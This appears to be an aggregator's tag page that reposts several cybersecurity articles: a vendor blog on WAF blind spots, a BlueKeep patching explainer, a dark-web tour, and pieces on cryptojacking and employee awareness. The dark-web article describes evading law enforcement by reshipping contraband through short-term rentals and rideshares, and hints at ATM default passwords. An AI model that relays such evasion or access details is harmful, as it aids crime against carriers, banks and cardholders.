now browsing by tag


#cyberfraud | #cybercriminals | What You Need to Know

Source: National Cyber Security – Produced By Gregory Evans Guest Contribution by Harold Kilpatrick, PR Consultancy A recent study showed that 66% of consumers had made an online purchase as a result of marketing campaigns. But most don’t even need research to know how useful email marketing can be. Between extensive reach, low cost, and […] View full post on

#deepweb | A Guide to Everything You Need to Know About Dark Data

Source: National Cyber Security – Produced By Gregory Evans We are living in a world where data is a currency, offering businesses leverage in the market. Hence data ought to be treated as a resource that needs to be exploited to the maximum potential. Normally, companies make use of structured data to collect information. However, […] View full post on

#cybersecurity | #hackerspace | Will Your WAF Know When You Are Compromised?

Source: National Cyber Security – Produced By Gregory Evans

In my last blog post “The Existential Crisis of a WAF,” I talked through the consequences of an attack getting through either by a rule not matching, a device misconfiguration, or traffic obfuscation. The latter includes the inability to decrypt and parse the traffic, which was the case with the Equifax breach. I also discussed Trusted Execution™, a new technology that provides huge value over the rule-based network security devices, including:

  1. Protection against Zero-Day attacks
  2. No False Positives = No Tuning and No Learning
  3. Visibility of the full “Kill-Chain”
  4. Blocking action at any phase of the Kill-Chain
  5. Very low Total Cost of Ownership

In this second installment, I thought I would explore the true cost in man-hours of a rule-based network security device, such as the WAF, NG Firewall, IDS/IPS. I am not going to put a number to the below scenario, but instead I want you to think about what the real cost is to you and your organization.

Good Guy Defensive Hacker Training

But first, I want to take a stroll down Memory Lane (no overflows, please…). When I was a young buck in the Air Force, I became an expert at the various IDS and firewall devices that were deployed at the time. One of the firewalls I was managing had several protocol “proxies,” including HTTP that made it capable of understanding the upper layers of the OSI stack web traffic and enforcing a negative security model for that protocol. In this sense, you can say that this firewall was the predecessor to the WAF. This firewall protected the base’s web page, and several employee portals, which was cutting-edge at the time. Every day I would come in and sift through the firewall logs to make sure no big red flags were present. I thought I was so cool, being the only one on base to be able to read the mountains of log entries.

That all changed when I was selected to go to a DOD Unix Security Course, where I was first introduced to the Buffer Overflow exploitations in the Unix finger and sendmail services, which were the exploitations that allowed the famed Morris Worm to be so successful in 1988 (

I learned how to think like a hacker: carefully performing target selection, reconnaissance, enumeration, exploitation, and finally ways to cover my tracks. I also learned methods to meticulously lock down the system in order to defend against hacking. To conclude the course, everyone in our training competed in a “Capture the Flag” exercise, which was both exhilarating and enlightening. In the end, I was completely pumped about cybersecurity. Who knew learning hacking techniques would open up new possibilities and turn my professional world upside down?! Sure, in the past I dabbled in hacking, but that was more with services like SMTP and FTP, and rudimentary password cracking. Slackware Linux was just gaining popularity as a free Unix-ish Operating System you can use for hacking, so serious hacking was restricted to licensed Unix and Solaris systems, which was cost prohibitive to the novice.

As Awareness Increases, a Scarier Reality Emerges

Knowing more also had its challenges. When I got back into my daily job reviewing firewall logs, I started to ask the tough “What If” questions: What if I messed up the firewall and exposed us? What if an attack got through? What if there is a hacker in our systems RIGHT NOW??? I could get court-martialed for incompetence! Shortly after my Unix Security training, the Air Force decided to classify all Information Systems as Weapon Systems. This meant that now we had to perform an extensive security audit, classification, and readiness accreditation of every IT system on base. I had to draft the contingency plans to cover the possibility of a compromised system. That led to an extremely important question – perhaps the most important question a security guy can ask:

“If we were compromised, how would I know?”

How Do You Know If Your Network Is Compromised?

Fast-forward to today, and guess what? That question is still a very valid one – How do you know if you are compromised? If you manage ANY security product, the one fact you have to accept is that you don’t know what you don’t know. Meaning, if an attack is not recognized by your security device for any of the reasons mentioned at the beginning of this post, can you prove that you were (or weren’t) compromised?

Consider this scenario: If I create a script to scan for all 34 documented CVEs that are related to Nginx web server (assuming each of them can be tested from the network), and I slip in one or two Zero-Day tests that actually get through (Yay Me!), for a single IP address targeted, what count of WAF alerts will you have? IDS alerts? Firewall alerts?

Thankfully, you may have a SIEM that gives you a grand total of 153 alerts (a completely arbitrary number) for the total count of devices in the path, including that shiny new RASP you just installed on the targeted server. Now what? What is the contingency plan to make sure every security device did its job and blocked the 34 attacks? Or is it 36? Or is it 100? Do you really know???

It just so happens that attack number 35 was a file-less buffer-overflow that was not yet released to the public, and I now own the box with at least the privileges of the Nginx process. (Inquire about our Nginx Attack Demo.) I am now “living off the land” until I am discovered. This period is called Dwell Time, and the clock is ticking until I am discovered, so I have to work fast to secure the beachhead and cover my tracks. I am thinking to myself that I generated enough “noise” with the other attacks, I am keeping you (the Security Administrator) busy trying to figure out what just happened. Chances are good you won’t find out I’m in your network for awhile.

Choose Between Blind Action or No Action?

So, now what? What is your course of action if you think an attack may have happened but you’re not sure? Without the sufficient evidence that the breach attempt was successful, can you request that the server be quarantined? How long will it take to sift through all the alerts and document the attack to give enough compelling evidence to justify disrupting business? Can the server just be replaced with a known-good image? What is the real cost of reacting to an attack? Or of not reacting? AND will you always react this way EVERY SINGLE TIME you see a flutter of alerts coming from an opportunistic web scanner?

20/20 Virsec Vision

I now have to ask another “What If” question: What if you had a tool in your toolbox that showed exactly what did, or did not happen to that Nginx web server? What if you could open up the Virsec UI and see that an attack got through the network, but Virsec did its job and killed the offensive spawned process? Virsec’s Trusted Execution technology detected the buffer overflow, saw the Nginx process jump from an authorized memory location to an unauthorized memory location, then triggered a Micro-Protection action that killed the offending Process ID, returning the application to smooth operation. No guesswork, no forensics, no quarantining, just a copasetic server humming along, serving out its share of inconvenienced electrons in the form of web pages.

Virsec In Action

In the example below, the Virsec system is in monitoring mode so we can see the entire Kill Chain of the attack. Starting from the bottom line, working up, it starts with a Buffer Overflow , where the system detects a jump to a memory location that is not intended by the application. We then see hostname executed, following by a wget that creates a file, modifies it, then deletes it.

Usually Buffer Overflow attacks are extremely hard to detect with conventional security products, but Virsec would have killed the offending process at the first alert, thereby stopping attackers in their tracks.

The result? You cut costs in the form of staff-hours, prove value in defending the network, and safeguard your customer’s data from being stolen. You become the hero and they place a bronze statue of you down in the lobby. Your next stop? CISO!

I hope you enjoyed this post, and for those of you who are maintaining industry certifications, don’t forget to put in for your CPEs when you read any of our blog posts. Cheers!

Further resources:

The Existential Crisis of a WAF

Making Applications Truly Self Defending: Nine Ways That Virsec Fills Gaps in RASP Security to Deliver Full Stack Application Security Self Defense


The post Will Your WAF Know When You Are Compromised? appeared first on Virsec Systems.

*** This is a Security Bloggers Network syndicated blog from Blog – Virsec Systems authored by Mark Pelkoski. Read the original post at:

Source link

The post #cybersecurity | #hackerspace |<p> Will Your WAF Know When You Are Compromised? <p> appeared first on National Cyber Security.

View full post on National Cyber Security

#cybersecurity | #infosec | What you Need to Know

Source: National Cyber Security – Produced By Gregory Evans

What is BlueKeep?

BlueKeep is the name that has been given to a security vulnerability that was discovered earlier this year in some versions of Microsoft Windows’ implementation of the Remote Desktop Protocol (RDP).

The vulnerability was described as “wormable” by Microsoft, and users were warned that BlueKeep might be exploited in a similar fashion to how the WannaCry ransomware used the Eternal Blue vulnerability to spread widely in 2017.

Warnings about the BlueKeep vulnerability have been issued by the UK’s National Cyber Security Centre (NCSC) and United States’s National Security Agency (NSA), as well as equivalent agencies in Germany and Australia, as well as Microsoft itself.

Microsoft considered the threat posed by BlueKeep to be so serious that the software giant took the unusual step of releasing patches for no-longer supported versions of Windows such as Windows Server 2003, Windows Vista, and Windows XP.

Sounds serious. Which other operating systems are vulnerable?

The RDP functionality on Windows 7 and Windows Server 2008 (both reaching the end of their support life-cycle) is also vulnerable, and should be patched as a matter of urgency.

But didn’t this all happen a while ago?

Yes, the patches from Microsoft came out in May, and although some IT teams acted fast to secure their critical Windows systems, hundreds of thousands of other internet-connected computers remain unpatched to this day.

So what have bad guys been doing with the BlueKeep vulnerability?

For some months it seemed not much was happening. But recently an attack was seen in the wild which attempted to install cryptomining software onto RDP servers that had not been patched, and had exposed port 3389 to the internet.

You said “attempted”…

Yes, the attack – first spotted by security researcher Kevin Beaumont – caused systems to crash with the infamous “blue screen of death.”

According to a ZDNet report, the reason why the attack failed was because of an incompatibility between the exploit code and a patch Microsoft had previously issued for the Intel CPU vulnerability known as Meltdown.

So, having vulnerable computers crash is bad but better than having them compromised by malicious code, right?

Right. If a computer crashes it might alert you that something’s wrong, and is certainly better than an attacker silently installing unauthorised code.

But it is widely expected that a revised version of the BlueKeep exploitation code will be issued this week which will NOT caused Meltdown-patched computers to crash.

So what should we do?

  • Patch your vulnerable computers now, with the fixes Microsoft issued earlier this year.
  • Block port 3389 used by the RDP protocol at your firewalls, especially if they are exposed to the internet.
  • Disable remote desktop services if they are not required.
  • Enable Network Level Authentication (NLA) to control who connects to your systems, and protect your network from unauthorised users and software.

Editor’s Note: The opinions expressed in this guest author article are solely those of the contributor, and do not necessarily reflect those of Tripwire, Inc.

Source link

The post #cybersecurity | #infosec | What you Need to Know appeared first on National Cyber Security.

View full post on National Cyber Security

#nationalcybersecuritymonth | Do You Know How To Protect Yourself Against Phishing Emails? – University Times

Source: National Cyber Security – Produced By Gregory Evans Close Illustration by Lauren Dahncke Illustration by Lauren Dahncke Illustration by Lauren Dahncke National Cybersecurity Awareness month recently came to an end, but phishing emails never seem to.  According to Cal State LA’s Information Technology Security, phishing emails are sent to the recipient with the purpose […] View full post on

#deepweb | Dark web websites: 10 things you should know

Source: National Cyber Security – Produced By Gregory Evans

Back in the 1970s, “darknet” wasn’t an ominous term: it simply referred to networks that were isolated from the mainstream of ARPANET for security purposes. But as ARPANET became the internet and then swallowed up nearly all the other computer networks out there, the word came to identify areas that were connected to the internet but not quite of it, difficult to find if you didn’t have a map.

The so-called dark web, a catch-all phrase covering the parts of the internet not indexed by search engines, is the stuff of grim legend. But like most legends, the reality is a bit more pedestrian. That’s not to say that scary stuff isn’t available on dark web websites, but some of the whispered horror stories you might’ve heard don’t make up the bulk of the transactions there.

We spoke to some security pros who offered to give us a bit of a guided tour of the web’s nether regions. Hopefully it will demystify things a bit.

Here are ten things you might not know about the dark web.

New dark web sites pop up every day…

A 2015 white paper from threat intelligence firm Recorded Future examines the linkages between the Web you know and the darknet. The paths usually begin on sites like Pastebin, originally intended as an easy place to upload long code samples or other text but now often where links to the anonymous Tor network are stashed for a few days or hours for interested parties. 

While searching for dark web sites isn’t as easy as using Google—the point is to be somewhat secretive, after all—there are ways to find out what’s there.  The screenshot below was provided by Radware security researcher Daniel Smith, and he says it’s the product of “automatic scripts that go out there and find new URLs, new onions, every day, and then list them. It’s kind of like Geocities, but 2018″—a vibe that’s helped along by pages with names like “My Deepweb Site,” which you can see on the screenshot.

fresh onions Daniel Smith

…and many are perfectly innocent

Matt Wilson, chief information security advisor at BTB Security, says that “there is a tame/lame side to the dark web that would probably surprise most people. You can exchange some cooking recipes—with video!—send email, or read a book. People use the dark web for these benign things for a variety of reasons: a sense of community, avoiding surveillance or tracking of internet habits, or just to do something in a different way.”

It’s worth remembering that what flourishes on darknet is material that’s been banned elsewhere online. For example, in 2015, in the wake of the Chinese government cracking down on VPN connections through the so-called “great firewall,” Chinese-language discussions started popping up on the darknet — mostly full of people who just wanted to talk to each other in peace.

Radware’s Smith points out that there are a variety of news outlets on the dark web, ranging from the news website from the hacking group Anonymous to the New York Times, shown in the screenshot here, all catering to people in countries that censor the open internet.

nytimes Daniel Smith

Some spaces are by invitation only

Of course, not everything is so innocent, or you wouldn’t be bothering to read this article. Still, “you can’t just fire up your Tor browser and request 10,000 credit card records, or passwords to your neighbor’s webcam,” says Mukul Kumar, CISO and VP of Cyber Practice at Cavirin. “Most of the verified ‘sensitive’ data is only available to those that have been vetted or invited to certain groups.”

How do you earn an invite into these kinds of dark web sites? “They’re going to want to see history of crime,” says Radware’s Smith. “Basically it’s like a mafia trust test. They want you to prove that you’re not a researcher and you’re not law enforcement. And a lot of those tests are going to be something that a researcher or law enforcement legally can’t do.”

There is bad stuff, and crackdowns means it’s harder to trust

As recently as last year, many dark web marketplaces for drugs and hacking services featured corporate-level customer service and customer reviews, making navigating simpler and safer for newbies. But now that law enforcement has begun to crack down on such sites, the experience is more chaotic and more dangerous.

“The whole idea of this darknet marketplace, where you have a peer review, where people are able to review drugs that they’re buying from vendors and get up on a forum and say, ‘Yes, this is real’ or ‘No, this actually hurt me’—that’s been curtailed now that dark marketplaces have been taken offline,” says Radware’s Smith. “You’re seeing third-party vendors open up their own shops, which are almost impossible to vet yourself personally. There’s not going to be any reviews, there’s not a lot of escrow services. And hence, by these takedowns, they’ve actually opened up a market for more scams to pop up.”

Reviews can be wrong, products sold under false pretenses—and stakes are high

There are still sites where drugs are reviewed, says Radware’s Smith, but keep in mind that they have to be taken with a huge grain of salt. A reviewer might get a high from something they bought online, but not understand what the drug was that provided it.

One reason these kinds of mistakes are made? Many dark web drug manufacturers will also purchase pill presses and dyes, which retail for only a few hundred dollars and can create dangerous lookalike drugs. “One of the more recent scares that I could cite would be Red Devil Xanax,” he said. “These were sold as some super Xanax bars, when in reality, they were nothing but horrible drugs designed to hurt you.”

The dark web provides wholesale goods for enterprising local retailers…

Smith says that some traditional drug cartels make use of the dark web networks for distribution—”it takes away the middleman and allows the cartels to send from their own warehouses and distribute it if they want to”—but small-time operators can also provide the personal touch at the local level after buying drug chemicals wholesale from China or elsewhere from sites like the one in the screenshot here. “You know how there are lots of local IPA microbreweries?” he says. “We also have a lot of local micro-laboratories. In every city, there’s probably at least one kid that’s gotten smart and knows how to order drugs on the darknet, and make a small amount of drugs to sell to his local network.”

xanax Daniel Smith

…who make extensive use of the gig economy

Smith describes how the darknet intersects with the unregulated and distributed world of the gig economy to help distribute contraband. “Say I want to have something purchased from the darknet shipped to me,” he says. “I’m not going expose my real address, right? I would have something like that shipped to an AirBnB—an address that can be thrown away, a burner. The box shows up the day they rent it, then they put the product in an Uber and send it to another location. It becomes very difficult for law enforcement to track, especially if you’re going across multiple counties.”

Not everything is for sale on the dark web

We’ve spent a lot of time talking about drugs here for a reason. Smith calls narcotics “the physical cornerstone” of the dark web; “cybercrime—selling exploits and vulnerabilities, web application attacks—that’s the digital cornerstone. Basically, I’d say a majority of the darknet is actually just drugs and kids talking about little crimes on forums.”

Some of the scarier sounding stuff you hear about being for sale often turns out to be largely rumors. Take firearms, for instance: as Smith puts it, “it would be easier for a criminal to purchase a gun in real life versus the internet. Going to the darknet is adding an extra step that isn’t necessary in the process. When you’re dealing with real criminals, they’re going to know someone that’s selling a gun.”

Specific niches are in

Still, there are some very specific darknet niche markets out there, even if they don’t have the same footprint that narcotics does. One that Smith drew my attention to was the world of skimmers, devices that fit into the slots of legitimate credit and ATM card readers and grab your bank account data.

And, providing another example of how the darknet marries physical objects for sale with data for sale, the same sites also provide data manual sheets for various popular ATM models. Among the gems available in these sheets are the default passwords for many popular internet-connected models; we won’t spill the beans here, but for many it’s the same digit repeated five times.

atm skinners Daniel Smith

It’s still mimicking the corporate world

Despite the crackdown on larger marketplaces, many dark web sites are still doing their best to simulate the look and feel of more corporate sites. 

elude Daniel Smith

The occasional swear word aside, for instance, the onion site for the Elude anonymous email service shown in this screenshot looks like it could come from any above-board company.

One odd feature of corporate software that has migrated to the dark web: the omnipresent software EULA. “A lot of times there’s malware I’m looking at that offers terms of services that try to prevent researchers from buying it,” he says. “And often I have to ask myself, ‘Is this person really going to come out of the dark and trying to sue someone for doing this?””

And you can use the dark web to buy more dark web

And, to prove that any online service can, eventually, be used to bootstrap itself, we have this final screenshot from our tour: a dark web site that will sell you everything you need to start your own dark web site.

docker Daniel Smith

Think of everything you can do there—until the next crackdown comes along.

Copyright © 2018 IDG Communications, Inc.

Source link

The post #deepweb | <p> Dark web websites: 10 things you should know <p> appeared first on National Cyber Security.

View full post on National Cyber Security

How to #Know If Your #Slow #Computer Is #Secretly #Mining #Cryptocurrency

Mining cryptocurrency used to require thousands of dollars worth of equipment to see any kind of meaningful return, but not anymore. Newer digital currencies like Monero, ByteCoin, and AEON have given would-be miners the ability to mine tokens right from their laptops. This might benefit small-time miners that want to get involved in the sector, but for every good thing online there are always people that figure out a way to use it for bad.

Hackers have begun using these tools to infect computers and websites to secretly mine cryptocurrencies. This emerging type of malware attack has been dubbed as “cryptojacking”, and it could cause your computer to overheat and crash. Luckily, spotting these hidden miners isn’t all that difficult.

Cryptojacking essentially hijacks your computer’s CPU power to mine. This means when you’re browsing the web, the malware is running in the background completely unbeknownst to you. There are a few types of this malware, and some run only when you visit a certain website and others can be maliciously installed on your computer. The best way to prevent this is by using antivirus software and adblockers.

If you’ve already been hit with this kind of malware, you’ll notice either your computer acting sluggish, getting warmer than usual, or its fan constantly spinning. If you aren’t running any kind of demanding software, like video games or video editing programs, this should be the first hint that your computer is working overtime.

If you’ve noticed your laptop acting up, it’s time to go check on what’s going on under the hood. Mac users can view a detailed breakdown of everything their computer is running by searching “Activity Monitor” and using the magnifying glass icon at the top-right of the screen. Windows users can simply hold down the Ctrl-Alt-Del keys to bring up “Task Manager.”

Both of these menus will display a graph of how much of your computer’s processing power is being used. Any massive spikes should be red flags. You’ll also see an ordered list of the programs using the most processing power at the moment. Before ending any of these programs be sure to research what they are, as you could be ending a crucial part of your operating system.

Both Tesla and the Los Angeles Times have had their sites infected by cryptojacking software. Companies with popular websites are the most at risk, as hackers can embed code onto their servers and use the CPU power of everyone who visits the site. But making it a habit to check on how your computer is running will ensure your device isn’t getting used to make someone else a crypto fortune.


The post How to #Know If Your #Slow #Computer Is #Secretly #Mining #Cryptocurrency appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Many #employees know #little about #cybersecurity #threats

Companies are surrounded by cybersecurity threats, but many are not making it a priority to educate employees about them, a survey says.

Nearly half (46%) of entry-level employees don’t know whether their company has a cybersecurity policy, according to research firm Clutch.

The survey demonstrated a lack of awareness that can put companies at risk for IT security breaches. Nearly two-thirds of employees (63%) said they don’t know whether the quantity of IT security threats their companies face will increase or decrease over the next year. Additionally, among entry-level employees, 87% said they don’t know how the number of threats will shift in the next year.

The survey also found that employees are less likely to recognize IT services as the primary area of security vulnerability at their company. Instead, they cited theft of company property as the primary threat to company security, ahead of unauthorized information and email phishing scams.

The findings are a bit ironic, because “most cyberbreaches are caused by employees, inadvertently,” Robert Anderson, co-chair of the cybersecurity and data privacy group at Lindabury, McCormick, Estabrook & Cooper, P.C., told FierceCEO.

“There is a tendency for businesses to not put the emphasis on employees, but they are the greatest vulnerability,” Anderson said.

Read More….


The post Many #employees know #little about #cybersecurity #threats appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

5 #Cybersecurity #Trends You Need To #Know

Source: National Cyber Security News

Cyberattacks are evolving. . . so must cybersecurity
If the past few years have told businesses anything, it’s that cybersecurity issues are not going to go away. Hackers, and the methods they use, are getting smarter. There are now more ways than ever for cybercriminals to exploit precious data and use it as a digital weapon. Big Data, while bringing positive disruption to business and society, has made it harder for organisations to keep track of information. So, what should organisations (and everybody else, for that matter) look out for in the next wave of cyber compromises?

1. Machine learning

According to a report by Webroot, 87 per cent of cybersecurity professionals use machine learning to predict and identify cybercrime. However, machine learning has also become a valued tool for hackers themselves. For example, artificially intelligent software can be used to automate the collection of information to get hold of data faster. It can also apply situational data to make it easier to crack passwords. Cybercriminals and cybersecurity professionals are locked in a constant game of technological cat and mouse.

2. IoT vulnerabilities

By 2020, Gartner forecasts that the Internet of Things will comprise over 20bn connected things.

Read More….


View full post on National Cyber Security Ventures

Singapore #passes new #Cybersecurity Bill: Here’s what you #need to #know before it comes into #force

Source: National Cyber Security News

The Singapore Parliament passed the much discussed Cybersecurity Bill (the Bill) on 5 February 2018 and it is anticipated that the new law will come into force soon.  The new law creates a regulatory framework for the monitoring and reporting of cybersecurity threats to essential services in Singapore through the appointment of the Commissioner of Cybersecurity.  It also creates a licensing regime that will require certain data security service providers in Singapore to be registered.

We set out below four key points that you should know about this new Bill.

1. Creation of a cybersecurity regulator

The Bill provides for the appointment of a Cybersecurity Commissioner (the “Commissioner”) as a regulator for the sector.

The Bill confers on the Commissioner significant powers to respond to, and prevent, cybersecurity incidents affecting Singapore. These powers include the powers of investigation such as the power to examine persons, require the production of evidence and to seize evidence. In addition, where satisfied that a cybersecurity threat meets a certain specified severity threshold, the Commissioner may require a person to carry out remedial measures or to cease certain activities.  These powers apply to all computer or computer systems in Singapore and are not limited to only Critical Information Infrastructure (CII) which is described in further detail below.

Read More….


View full post on National Cyber Security Ventures